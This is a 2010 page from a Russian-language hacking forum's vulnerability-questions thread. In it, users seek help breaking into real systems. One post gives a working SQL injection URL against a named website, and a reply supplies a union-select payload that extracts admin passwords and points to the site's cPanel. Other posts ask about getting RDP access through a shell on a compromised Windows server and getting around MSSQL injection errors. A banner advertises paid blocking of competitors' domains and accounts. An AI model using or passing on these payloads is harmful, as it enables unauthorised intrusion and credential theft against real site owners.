Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1497 из 2422

1497

Опции темы

Поиск в этой теме

Опции просмотра

10.10.2010, 19:47

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?

𝕏 Twitter Reddit Telegram Копировать ссылку

10.10.2010, 19:58

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

С нами: 9000386

Репутация: 1148

Цитата:

Сообщение от .:[melkiy

:."]
.:[melkiy]:. said:
есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?

там мой пост

в консоли команды прописываеш, а потом mstsc.

10.10.2010, 20:40

S-J

Познающий

Регистрация: 24.09.2010

Сообщений: 84

С нами: 8227766

Репутация: 0

Помогите раскрутить найденную уязвимость=)

http://www.thegotomom.com/blog-post.php?id=118%20and%201=0%20union%20select%20666 1,%28select%20group_concat%28column_name%29%20from %20information_schema.columns%20where%20table_name %20=%200x61646d696e5f74626c%29,6663,6664,6665%20fr om%20admin_tbl--+

админку найте не могу...

//здесь не помогают ломать =\ а помогают раскрутить найденную уязвимость

10.10.2010, 21:16

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

С нами: 9061916

Репутация: 0

Цитата:

Сообщение от S-J

Помогите раскрутить найденную уязвимость=)

http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl

10.10.2010, 21:33

S-J

Познающий

Регистрация: 24.09.2010

Сообщений: 84

С нами: 8227766

Репутация: 0

Цитата:

Сообщение от d1v

http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl

Спасибо ещё бы админку)

10.10.2010, 23:26

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

С нами: 9361870

Репутация: 58

есть mssql inj

структура таблицы:

Цитата:

Сообщение от None

[Allmembers
ostCode]
[Allmembers:Telephone]
[Allmembers:EnquiryDate]
[Allmembers:GenderCode]
[Allmembers:LastMailShotDate]
[Allmembers:StatusID]
[Allmembers:ContactMeans]
[Allmembers:County]
[Allmembers:BoxNo]
[Allmembers:E-mail]
[Allmembers:showemail]
[Allmembers:NickName]
[Allmembers
ateOfBirth]

не получается вывести инфо из нее - на все запросы выдает:

Invalid column name 'E-mail'.

как обойти?

и еще вопрос - как узнать количество записеи в табле?

11.10.2010, 00:31

swat_

Новичок

Регистрация: 04.11.2009

Сообщений: 4

С нами: 8693835

Репутация: 0

Цитата:

Сообщение от S-J

Спасибо ещё бы админку)

cpanel.thegotomom.com

webdisk.thegotomom.com

11.10.2010, 00:49

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

С нами: 9147012

Репутация: 9

Цитата:

Сообщение от j0ker13

есть mssql inj
структура таблицы:
не получается вывести инфо из нее - на все запросы выдает:
Invalid column name 'E-mail'.
как обойти?
и еще вопрос - как узнать количество записеи в табле?

Шифруй слово "email" в HEX или CHAR

11.10.2010, 10:58

-PRIVAT-

Участник форума

Регистрация: 17.04.2010

Сообщений: 221

С нами: 8456912

Репутация: 17

Цитата:

Сообщение от Gemini12

Шифруй слово "email" в HEX или CHAR

Вот скажи мне, зачем?

#10

11.10.2010, 11:24

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

С нами: 9361870

Репутация: 58

дело не в этом.

даже при запросе

Цитата:

Сообщение от None

select StatusID from Allmembers

выдает

Цитата:

Сообщение от None

Invalid column name 'E-mail

Страница 1497 из 2422

1497

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57